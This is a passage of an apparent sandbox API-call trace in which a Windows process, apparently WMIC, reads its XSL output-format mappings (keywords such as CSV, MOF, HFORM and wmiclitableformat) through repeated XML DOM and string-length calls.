returned 0x0 [0256.261] IXMLDOMNode:get_attributes (in: This=0x21ebd50, attributeMap=0x18f618 | out: attributeMap=0x18f618*=0x21e78d0) returned 0x0 [0256.261] malloc (_Size=0x18) returned 0x2bc660 [0256.261] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21e78d0, name="KEYWORD", namedItem=0x18f628 | out: namedItem=0x18f628*=0x21ea280) returned 0x0 [0256.261] free (_Block=0x2bc660) [0256.261] IXMLDOMNode:get_nodeValue (in: This=0x21ea280, value=0x18f660 | out: value=0x18f660*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HFORM", varVal2=0x4)) returned 0x0 [0256.261] malloc (_Size=0x18) returned 0x2bc660 [0256.261] malloc (_Size=0x18) returned 0x2bc680 [0256.261] SysStringLen (param_1="HFORM") returned 0x5 [0256.261] SysStringLen (param_1="TABLE") returned 0x5 [0256.261] SysStringLen (param_1="HFORM") returned 0x5 [0256.261] SysStringLen (param_1="LIST") returned 0x4 [0256.261] SysStringLen (param_1="HFORM") returned 0x5 [0256.261] SysStringLen (param_1="HTABLE") returned 0x6 [0256.261] malloc (_Size=0x30) returned 0x2b81c0 [0256.262] IUnknown:Release (This=0x21ebd50) returned 0x0 [0256.262] IUnknown:Release (This=0x21e78d0) returned 0x0 [0256.262] IUnknown:Release (This=0x21ea280) returned 0x0 [0256.262] IXMLDOMNodeList:get_item (in: This=0x21e9cc0, index=6, listItem=0x18f610 | out: listItem=0x18f610*=0x21ebd50) returned 0x0 [0256.262] IXMLDOMNode:get_text (in: This=0x21ebd50, text=0x18f620 | out: text=0x18f620*="xml.xsl") returned 0x0 [0256.262] IXMLDOMNode:get_attributes (in: This=0x21ebd50, attributeMap=0x18f618 | out: attributeMap=0x18f618*=0x21e78d0) returned 0x0 [0256.262] malloc (_Size=0x18) returned 0x2bc6a0 [0256.262] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21e78d0, name="KEYWORD", namedItem=0x18f628 | out: namedItem=0x18f628*=0x21ea280) returned 0x0 [0256.262] free (_Block=0x2bc6a0) [0256.262] IXMLDOMNode:get_nodeValue (in: This=0x21ea280, value=0x18f660 | out: value=0x18f660*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XML", varVal2=0x4)) returned 0x0 [0256.262] malloc (_Size=0x18) returned 0x2bc6a0 [0256.262] malloc (_Size=0x18) returned 0x2bc6c0 [0256.262] SysStringLen (param_1="XML") returned 0x3 [0256.262] SysStringLen (param_1="TABLE") returned 0x5 [0256.262] SysStringLen (param_1="XML") returned 0x3 [0256.262] SysStringLen (param_1="VALUE") returned 0x5 [0256.263] SysStringLen (param_1="VALUE") returned 0x5 [0256.263] SysStringLen (param_1="XML") returned 0x3 [0256.263] malloc (_Size=0x30) returned 0x2b8200 [0256.263] IUnknown:Release (This=0x21ebd50) returned 0x0 [0256.263] IUnknown:Release (This=0x21e78d0) returned 0x0 [0256.263] IUnknown:Release (This=0x21ea280) returned 0x0 [0256.263] IXMLDOMNodeList:get_item (in: This=0x21e9cc0, index=7, listItem=0x18f610 | out: listItem=0x18f610*=0x21ebd50) returned 0x0 [0256.263] IXMLDOMNode:get_text (in: This=0x21ebd50, text=0x18f620 | out: text=0x18f620*="mof.xsl") returned 0x0 [0256.263] IXMLDOMNode:get_attributes (in: This=0x21ebd50, attributeMap=0x18f618 | out: attributeMap=0x18f618*=0x21e78d0) returned 0x0 [0256.263] malloc (_Size=0x18) returned 0x2bc6e0 [0256.263] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21e78d0, name="KEYWORD", namedItem=0x18f628 | out: namedItem=0x18f628*=0x21ea280) returned 0x0 [0256.263] free (_Block=0x2bc6e0) [0256.263] IXMLDOMNode:get_nodeValue (in: This=0x21ea280, value=0x18f660 | out: value=0x18f660*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MOF", varVal2=0x4)) returned 0x0 [0256.263] malloc (_Size=0x18) returned 0x2bc6e0 [0256.263] malloc (_Size=0x18) returned 0x2bc700 [0256.263] SysStringLen (param_1="MOF") returned 0x3 [0256.264] SysStringLen (param_1="TABLE") returned 0x5 [0256.264] SysStringLen (param_1="MOF") returned 0x3 [0256.264] SysStringLen (param_1="LIST") returned 0x4 [0256.264] SysStringLen (param_1="MOF") returned 0x3 [0256.264] SysStringLen (param_1="RAWXML") returned 0x6 [0256.264] SysStringLen (param_1="LIST") returned 0x4 [0256.264] SysStringLen (param_1="MOF") returned 0x3 [0256.264] malloc (_Size=0x30) returned 0x2b8240 [0256.264] IUnknown:Release (This=0x21ebd50) returned 0x0 [0256.264] IUnknown:Release (This=0x21e78d0) returned 0x0 [0256.264] IUnknown:Release (This=0x21ea280) returned 0x0 [0256.264] IXMLDOMNodeList:get_item (in: This=0x21e9cc0, index=8, listItem=0x18f610 | out: listItem=0x18f610*=0x21ebd50) returned 0x0 [0256.264] IXMLDOMNode:get_text (in: This=0x21ebd50, text=0x18f620 | out: text=0x18f620*="csv.xsl") returned 0x0 [0256.264] IXMLDOMNode:get_attributes (in: This=0x21ebd50, attributeMap=0x18f618 | out: attributeMap=0x18f618*=0x21e78d0) returned 0x0 [0256.264] malloc (_Size=0x18) returned 0x2bc720 [0256.264] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21e78d0, name="KEYWORD", namedItem=0x18f628 | out: namedItem=0x18f628*=0x21ea280) returned 0x0 [0256.264] free (_Block=0x2bc720) [0256.264] IXMLDOMNode:get_nodeValue (in: This=0x21ea280, value=0x18f660 | out: value=0x18f660*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CSV", varVal2=0x4)) returned 0x0 [0256.264] malloc (_Size=0x18) returned 0x2bc720 [0256.265] malloc (_Size=0x18) returned 0x2bc740 [0256.265] SysStringLen (param_1="CSV") returned 0x3 [0256.265] SysStringLen (param_1="TABLE") returned 0x5 [0256.265] SysStringLen (param_1="CSV") returned 0x3 [0256.265] SysStringLen (param_1="LIST") returned 0x4 [0256.265] SysStringLen (param_1="CSV") returned 0x3 [0256.265] SysStringLen (param_1="HTABLE") returned 0x6 [0256.265] SysStringLen (param_1="CSV") returned 0x3 [0256.265] SysStringLen (param_1="HFORM") returned 0x5 [0256.265] malloc (_Size=0x30) returned 0x2b8280 [0256.265] IUnknown:Release (This=0x21ebd50) returned 0x0 [0256.265] IUnknown:Release (This=0x21e78d0) returned 0x0 [0256.265] IUnknown:Release (This=0x21ea280) returned 0x0 [0256.265] IXMLDOMNodeList:get_item (in: This=0x21e9cc0, index=9, listItem=0x18f610 | out: listItem=0x18f610*=0x21ebd50) returned 0x0 [0256.265] IXMLDOMNode:get_text (in: This=0x21ebd50, text=0x18f620 | out: text=0x18f620*="texttable.xsl") returned 0x0 [0256.265] IXMLDOMNode:get_attributes (in: This=0x21ebd50, attributeMap=0x18f618 | out: attributeMap=0x18f618*=0x21e78d0) returned 0x0 [0256.265] malloc (_Size=0x18) returned 0x2bc760 [0256.265] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21e78d0, name="KEYWORD", namedItem=0x18f628 | out: namedItem=0x18f628*=0x21ea280) returned 0x0 [0256.266] free (_Block=0x2bc760) [0256.266] IXMLDOMNode:get_nodeValue (in: This=0x21ea280, value=0x18f660 | out: value=0x18f660*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys.xsl", varVal2=0x4)) returned 0x0 [0256.266] malloc (_Size=0x18) returned 0x2bc760 [0256.266] malloc (_Size=0x18) returned 0x2bc780 [0256.266] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0256.266] SysStringLen (param_1="TABLE") returned 0x5 [0256.266] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0256.266] SysStringLen (param_1="VALUE") returned 0x5 [0256.266] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0256.266] SysStringLen (param_1="XML") returned 0x3 [0256.266] SysStringLen (param_1="XML") returned 0x3 [0256.266] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0256.266] malloc (_Size=0x30) returned 0x2b82c0 [0256.266] IUnknown:Release (This=0x21ebd50) returned 0x0 [0256.266] IUnknown:Release (This=0x21e78d0) returned 0x0 [0256.266] IUnknown:Release (This=0x21ea280) returned 0x0 [0256.266] IXMLDOMNodeList:get_item (in: This=0x21e9cc0, index=10, listItem=0x18f610 | out: listItem=0x18f610*=0x21ebd50) returned 0x0 [0256.266] IXMLDOMNode:get_text (in: This=0x21ebd50, text=0x18f620 | out: text=0x18f620*="texttable.xsl") returned 0x0 [0256.266] IXMLDOMNode:get_attributes (in: This=0x21ebd50, attributeMap=0x18f618 | out: attributeMap=0x18f618*=0x21e78d0) returned 0x0 [0256.267] malloc (_Size=0x18) returned 0x2bc7a0 [0256.267] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21e78d0, name="KEYWORD", namedItem=0x18f628 | out: namedItem=0x18f628*=0x21ea280) returned 0x0 [0256.267] free (_Block=0x2bc7a0) [0256.267] IXMLDOMNode:get_nodeValue (in: This=0x21ea280, value=0x18f660 | out: value=0x18f660*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys", varVal2=0x4)) returned 0x0 [0256.267] malloc (_Size=0x18) returned 0x2bc7a0 [0256.267] malloc (_Size=0x18) returned 0x2bc7c0 [0256.267] SysStringLen (param_1="texttablewsys") returned 0xd [0256.267] SysStringLen (param_1="TABLE") returned 0x5 [0256.267] SysStringLen (param_1="texttablewsys") returned 0xd [0256.267] SysStringLen (param_1="XML") returned 0x3 [0256.267] SysStringLen (param_1="texttablewsys") returned 0xd [0256.267] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0256.267] SysStringLen (param_1="XML") returned 0x3 [0256.268] SysStringLen (param_1="texttablewsys") returned 0xd [0256.268] malloc (_Size=0x30) returned 0x2b8300 [0256.268] IUnknown:Release (This=0x21ebd50) returned 0x0 [0256.268] IUnknown:Release (This=0x21e78d0) returned 0x0 [0256.268] IUnknown:Release (This=0x21ea280) returned 0x0 [0256.268] IXMLDOMNodeList:get_item (in: This=0x21e9cc0, index=11, listItem=0x18f610 | out: listItem=0x18f610*=0x21ebd50) returned 0x0 [0256.268] IXMLDOMNode:get_text (in: This=0x21ebd50, text=0x18f620 | out: text=0x18f620*="texttable.xsl") returned 0x0 [0256.268] IXMLDOMNode:get_attributes (in: This=0x21ebd50, attributeMap=0x18f618 | out: attributeMap=0x18f618*=0x21e78d0) returned 0x0 [0256.268] malloc (_Size=0x18) returned 0x2bc7e0 [0256.268] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21e78d0, name="KEYWORD", namedItem=0x18f628 | out: namedItem=0x18f628*=0x21ea280) returned 0x0 [0256.268] free (_Block=0x2bc7e0) [0256.268] IXMLDOMNode:get_nodeValue (in: This=0x21ea280, value=0x18f660 | out: value=0x18f660*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat.xsl", varVal2=0x4)) returned 0x0 [0256.268] malloc (_Size=0x18) returned 0x2bc7e0 [0256.268] malloc (_Size=0x18) returned 0x2bc800 [0256.268] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0256.269] SysStringLen (param_1="TABLE") returned 0x5 [0256.269] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0256.269] SysStringLen (param_1="XML") returned 0x3 [0256.269] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0256.269] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0256.269] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0256.269] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0256.269] malloc (_Size=0x30) returned 0x2b8340 [0256.269] IUnknown:Release (This=0x21ebd50) returned 0x0 [0256.269] IUnknown:Release (This=0x21e78d0) returned 0x0 [0256.269] IUnknown:Release (This=0x21ea280) returned 0x0 [0256.269] IXMLDOMNodeList:get_item (in: This=0x21e9cc0, index=12, listItem=0x18f610 | out: listItem=0x18f610*=0x21ebd50) returned 0x0 [0256.269] IXMLDOMNode:get_text (in: This=0x21ebd50, text=0x18f620 | out: text=0x18f620*="texttable.xsl") returned 0x0 [0256.269] IXMLDOMNode:get_attributes (in: This=0x21ebd50, attributeMap=0x18f618 | out: attributeMap=0x18f618*=0x21e78d0) returned 0x0 [0256.269] malloc (_Size=0x18) returned 0x2bc820 [0256.269] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21e78d0, name="KEYWORD", namedItem=0x18f628 | out: namedItem=0x18f628*=0x21ea280) returned 0x0 [0256.269] free (_Block=0x2bc820) [0256.270] IXMLDOMNode:get_nodeValue (in: This=0x21ea280, value=0x18f660 | out: value=0x18f660*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat", varVal2=0x4)) returned 0x0 [0256.270] malloc (_Size=0x18) returned 0x2bc820 [0256.270] malloc (_Size=0x18) returned 0x2bc840 [0256.270] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0256.270] SysStringLen (param_1="TABLE") returned 0x5 [0256.270] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0256.270] SysStringLen (param_1="XML") returned 0x3 [0256.270] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0256.270] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0256.270] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0256.270] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0256.270] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0256.270] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0256.270] malloc (_Size=0x30) returned 0x2b8380 [0256.270] IUnknown:Release (This=0x21ebd50) returned 0x0 [0256.270] IUnknown:Release (This=0x21e78d0) returned 0x0 [0256.270] IUnknown:Release (This=0x21ea280) returned 0x0 [0256.270] IXMLDOMNodeList:get_item (in: This=0x21e9cc0, index=13, listItem=0x18f610 | out: listItem=0x18f610*=0x21ebd50) returned 0x0 [0256.270] IXMLDOMNode:get_text (in: This=0x21ebd50, text=0x18f620 | out: text=0x18f620*="texttable.xsl") returned 0x0 [0256.270] IXMLDOMNode:get_attributes (in: This=0x21ebd50, attributeMap=0x18f618 | out: attributeMap=0x18f618*=0x21e78d0) returned 0x0 [0256.270] malloc (_Size=0x18) returned 0x2bc860 [0256.271] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21e78d0, name="KEYWORD", namedItem=0x18f628 | out: namedItem=0x18f628*=0x21ea280) returned 0x0 [0256.271] free (_Block=0x2bc860) [0256.271] IXMLDOMNode:get_nodeValue (in: This=0x21ea280, value=0x18f660 | out: value=0x18f660*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys.xsl", varVal2=0x4)) returned 0x0 [0256.271] malloc (_Size=0x18) returned 0x2bc860 [0256.271] malloc (_Size=0x18) returned 0x2bc880 [0256.271] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0256.271] SysStringLen (param_1="TABLE") returned 0x5 [0256.271] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0256.271] SysStringLen (param_1="XML") returned 0x3 [0256.271] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0256.271] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0256.271] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0256.271] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0256.271] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0256.271] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0256.271] malloc (_Size=0x30) returned 0x2b83c0 [0256.271] IUnknown:Release (This=0x21ebd50) returned 0x0 [0256.271] IUnknown:Release (This=0x21e78d0) returned 0x0 [0256.272] IUnknown:Release (This=0x21ea280) returned 0x0 [0256.272] IXMLDOMNodeList:get_item (in: This=0x21e9cc0, index=14, listItem=0x18f610 | out: listItem=0x18f610*=0x21ebd50) returned 0x0 [0256.272] IXMLDOMNode:get_text (in: This=0x21ebd50, text=0x18f620 | out: text=0x18f620*="texttable.xsl") returned 0x0 [0256.272] IXMLDOMNode:get_attributes (in: This=0x21ebd50, attributeMap=0x18f618 | out: attributeMap=0x18f618*=0x21e78d0) returned 0x0 [0256.272] malloc (_Size=0x18) returned 0x2bc8a0 [0256.272] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21e78d0, name="KEYWORD", namedItem=0x18f628 | out: namedItem=0x18f628*=0x21ea280) returned 0x0 [0256.272] free (_Block=0x2bc8a0) [0256.272] IXMLDOMNode:get_nodeValue (in: This=0x21ea280, value=0x18f660 | out: value=0x18f660*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys", varVal2=0x4)) returned 0x0 [0256.272] malloc (_Size=0x18) returned 0x2bc8a0 [0256.272] malloc (_Size=0x18) returned 0x2bc8c0 [0256.272] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0256.272] SysStringLen (param_1="TABLE") returned 0x5 [0256.272] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0256.272] SysStringLen (param_1="XML") returned 0x3 [0256.272] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0256.272] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0256.273] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0256.273] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0256.273] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0256.273] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0256.273] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0256.273] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0256.273] malloc (_Size=0x30) returned 0x2b8400 [0256.273] IUnknown:Release (This=0x21ebd50) returned 0x0 [0256.273] IUnknown:Release (This=0x21e78d0) returned 0x0 [0256.273] IUnknown:Release (This=0x21ea280) returned 0x0 [0256.273] IXMLDOMNodeList:get_item (in: This=0x21e9cc0, index=15, listItem=0x18f610 | out: listItem=0x18f610*=0x21ebd50) returned 0x0 [0256.273] IXMLDOMNode:get_text (in: This=0x21ebd50, text=0x18f620 | out: text=0x18f620*="htable.xsl") returned 0x0 [0256.273] IXMLDOMNode:get_attributes (in: This=0x21ebd50, attributeMap=0x18f618 | out: attributeMap=0x18f618*=0x21e78d0) returned 0x0 [0256.273] malloc (_Size=0x18) returned 0x2bc8e0 [0256.273] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21e78d0, name="KEYWORD", namedItem=0x18f628 | out: namedItem=0x18f628*=0x21ea280) returned 0x0 [0256.273] free (_Block=0x2bc8e0) [0256.273] IXMLDOMNode:get_nodeValue (in: This=0x21ea280, value=0x18f660 | out: value=0x18f660*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby.xsl", varVal2=0x4)) returned 0x0 [0256.273] malloc (_Size=0x18) returned 0x2bc8e0 [0256.274] malloc (_Size=0x18) returned 0x2bc900 [0256.274] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0256.274] SysStringLen (param_1="TABLE") returned 0x5 [0256.274] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0256.274] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0256.274] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0256.274] SysStringLen (param_1="XML") returned 0x3 [0256.274] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0256.274] SysStringLen (param_1="texttablewsys") returned 0xd [0256.274] SysStringLen (param_1="XML") returned 0x3 [0256.274] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0256.274] malloc (_Size=0x30) returned 0x2b8440 [0256.274] IUnknown:Release (This=0x21ebd50) returned 0x0 [0256.274] IUnknown:Release (This=0x21e78d0) returned 0x0 [0256.274] IUnknown:Release (This=0x21ea280) returned 0x0 [0256.274] IXMLDOMNodeList:get_item (in: This=0x21e9cc0, index=16, listItem=0x18f610 | out: listItem=0x18f610*=0x21ebd50) returned 0x0 [0256.274] IXMLDOMNode:get_text (in: This=0x21ebd50, text=0x18f620 | out: text=0x18f620*="htable.xsl") returned 0x0 [0256.274] IXMLDOMNode:get_attributes (in: This=0x21ebd50, attributeMap=0x18f618 | out: attributeMap=0x18f618*=0x21e78d0) returned 0x0 [0256.274] malloc (_Size=0x18) returned 0x2bc920 [0256.274] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21e78d0, name="KEYWORD", namedItem=0x18f628 | out: namedItem=0x18f628*=0x21ea280) returned 0x0 [0256.274] free (_Block=0x2bc920) [0256.275] IXMLDOMNode:get_nodeValue (in: This=0x21ea280, value=0x18f660 | out: value=0x18f660*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby", varVal2=0x4)) returned 0x0 [0256.275] malloc (_Size=0x18) returned 0x2bc920 [0256.275] malloc (_Size=0x18) returned 0x2bc940 [0256.275] SysStringLen (param_1="htable-sortby") returned 0xd [0256.275] SysStringLen (param_1="TABLE") returned 0x5 [0256.275] SysStringLen (param_1="htable-sortby") returned 0xd [0256.275] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0256.275] SysStringLen (param_1="htable-sortby") returned 0xd [0256.275] SysStringLen (param_1="XML") returned 0x3 [0256.275] SysStringLen (param_1="htable-sortby") returned 0xd [0256.275] SysStringLen (param_1="texttablewsys") returned 0xd [0256.275] SysStringLen (param_1="htable-sortby") returned 0xd [0256.275] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0256.275] SysStringLen (param_1="XML") returned 0x3 [0256.275] SysStringLen (param_1="htable-sortby") returned 0xd [0256.275] malloc (_Size=0x30) returned 0x2b8480 [0256.275] IUnknown:Release (This=0x21ebd50) returned 0x0 [0256.275] IUnknown:Release (This=0x21e78d0) returned 0x0 [0256.275] IUnknown:Release (This=0x21ea280) returned 0x0 [0256.275] IXMLDOMNodeList:get_item (in: This=0x21e9cc0, index=17, listItem=0x18f610 | out: listItem=0x18f610*=0x21ebd50) returned 0x0 [0256.275] IXMLDOMNode:get_text (in: This=0x21ebd50, text=0x18f620 | out: text=0x18f620*="mof.xsl") returned 0x0 [0256.275] IXMLDOMNode:get_attributes (in: This=0x21ebd50, attributeMap=0x18f618 | out: attributeMap=0x18f618*=0x21e78d0) returned 0x0 [0256.275] malloc (_Size=0x18) returned 0x2bc960 [0256.276] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21e78d0, name="KEYWORD", namedItem=0x18f628 | out: namedItem=0x18f628*=0x21ea280) returned 0x0 [0256.276] free (_Block=0x2bc960) [0256.276] IXMLDOMNode:get_nodeValue (in: This=0x21ea280, value=0x18f660 | out: value=0x18f660*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat.xsl", varVal2=0x4)) returned 0x0 [0256.276] malloc (_Size=0x18) returned 0x2bc960 [0256.276] malloc (_Size=0x18) returned 0x2bc980 [0256.276] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0256.276] SysStringLen (param_1="TABLE") returned 0x5 [0256.276] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0256.276] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0256.276] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0256.276] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0256.276] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0256.276] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0256.276] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0256.276] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0256.276] malloc (_Size=0x30) returned 0x2b84c0 [0256.276] IUnknown:Release (This=0x21ebd50) returned 0x0 [0256.276] IUnknown:Release (This=0x21e78d0) returned 0x0 [0256.276] IUnknown:Release (This=0x21ea280) returned 0x0 [0256.277] IXMLDOMNodeList:get_item (in: This=0x21e9cc0, index=18, listItem=0x18f610 | out: listItem=0x18f610*=0x21ebd50) returned 0x0 [0256.277] IXMLDOMNode:get_text (in: This=0x21ebd50, text=0x18f620 | out: text=0x18f620*="mof.xsl") returned 0x0 [0256.277] IXMLDOMNode:get_attributes (in: This=0x21ebd50, attributeMap=0x18f618 | out: attributeMap=0x18f618*=0x21e78d0) returned 0x0 [0256.277] malloc (_Size=0x18) returned 0x2bc9a0 [0256.277] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21e78d0, name="KEYWORD", namedItem=0x18f628 | out: namedItem=0x18f628*=0x21ea280) returned 0x0 [0256.277] free (_Block=0x2bc9a0) [0256.277] IXMLDOMNode:get_nodeValue (in: This=0x21ea280, value=0x18f660 | out: value=0x18f660*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat", varVal2=0x4)) returned 0x0 [0256.277] malloc (_Size=0x18) returned 0x2bc9a0 [0256.277] malloc (_Size=0x18) returned 0x2bc9c0 [0256.277] SysStringLen (param_1="wmiclimofformat") returned 0xf [0256.277] SysStringLen (param_1="TABLE") returned 0x5 [0256.277] SysStringLen (param_1="wmiclimofformat") returned 0xf [0256.277] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0256.277] SysStringLen (param_1="wmiclimofformat") returned 0xf [0256.277] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0256.277] SysStringLen (param_1="wmiclimofformat") returned 0xf [0256.277] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0256.277] SysStringLen (param_1="wmiclimofformat") returned 0xf [0256.277] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0256.278] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0256.278] SysStringLen (param_1="wmiclimofformat") returned 0xf [0256.278] malloc (_Size=0x30) returned 0x2b8500 [0256.278] IUnknown:Release (This=0x21ebd50) returned 0x0 [0256.278] IUnknown:Release (This=0x21e78d0) returned 0x0 [0256.278] IUnknown:Release (This=0x21ea280) returned 0x0 [0256.278] IXMLDOMNodeList:get_item (in: This=0x21e9cc0, index=19, listItem=0x18f610 | out: listItem=0x18f610*=0x21ebd50) returned 0x0 [0256.278] IXMLDOMNode:get_text (in: This=0x21ebd50, text=0x18f620 | out: text=0x18f620*="textvaluelist.xsl") returned 0x0 [0256.278] IXMLDOMNode:get_attributes (in: This=0x21ebd50, attributeMap=0x18f618 | out: attributeMap=0x18f618*=0x21e78d0) returned 0x0 [0256.278] malloc (_Size=0x18) returned 0x2bc9e0 [0256.278] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21e78d0, name="KEYWORD", namedItem=0x18f628 | out: namedItem=0x18f628*=0x21ea280) returned 0x0 [0256.278] free (_Block=0x2bc9e0) [0256.278] IXMLDOMNode:get_nodeValue (in: This=0x21ea280, value=0x18f660 | out: value=0x18f660*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat.xsl", varVal2=0x4)) returned 0x0 [0256.278] malloc (_Size=0x18) returned 0x2bc9e0 [0256.278] malloc (_Size=0x18) returned 0x2bca00 [0256.278] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0256.278] SysStringLen (param_1="TABLE") returned 0x5 [0256.279] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0256.279] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0256.279] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0256.279] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0256.279] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0256.279] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0256.279] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0256.279] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0256.279] malloc (_Size=0x30) returned 0x2b8540 [0256.279] IUnknown:Release (This=0x21ebd50) returned 0x0 [0256.279] IUnknown:Release (This=0x21e78d0) returned 0x0 [0256.279] IUnknown:Release (This=0x21ea280) returned 0x0 [0256.279] IXMLDOMNodeList:get_item (in: This=0x21e9cc0, index=20, listItem=0x18f610 | out: listItem=0x18f610*=0x21ebd50) returned 0x0 [0256.279] IXMLDOMNode:get_text (in: This=0x21ebd50, text=0x18f620 | out: text=0x18f620*="textvaluelist.xsl") returned 0x0 [0256.279] IXMLDOMNode:get_attributes (in: This=0x21ebd50, attributeMap=0x18f618 | out: attributeMap=0x18f618*=0x21e78d0) returned 0x0 [0256.279] malloc (_Size=0x18) returned 0x2bca20 [0256.279] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21e78d0, name="KEYWORD", namedItem=0x18f628 | out: namedItem=0x18f628*=0x21ea280) returned 0x0 [0256.279] free (_Block=0x2bca20) [0256.280] IXMLDOMNode:get_nodeValue (in: This=0x21ea280, value=0x18f660 | out: value=0x18f660*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat", varVal2=0x4)) returned 0x0 [0256.280] malloc (_Size=0x18) returned 0x2bca20 [0256.280] malloc (_Size=0x18) returned 0x2bca40 [0256.280] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0256.280] SysStringLen (param_1="TABLE") returned 0x5 [0256.280] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0256.280] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 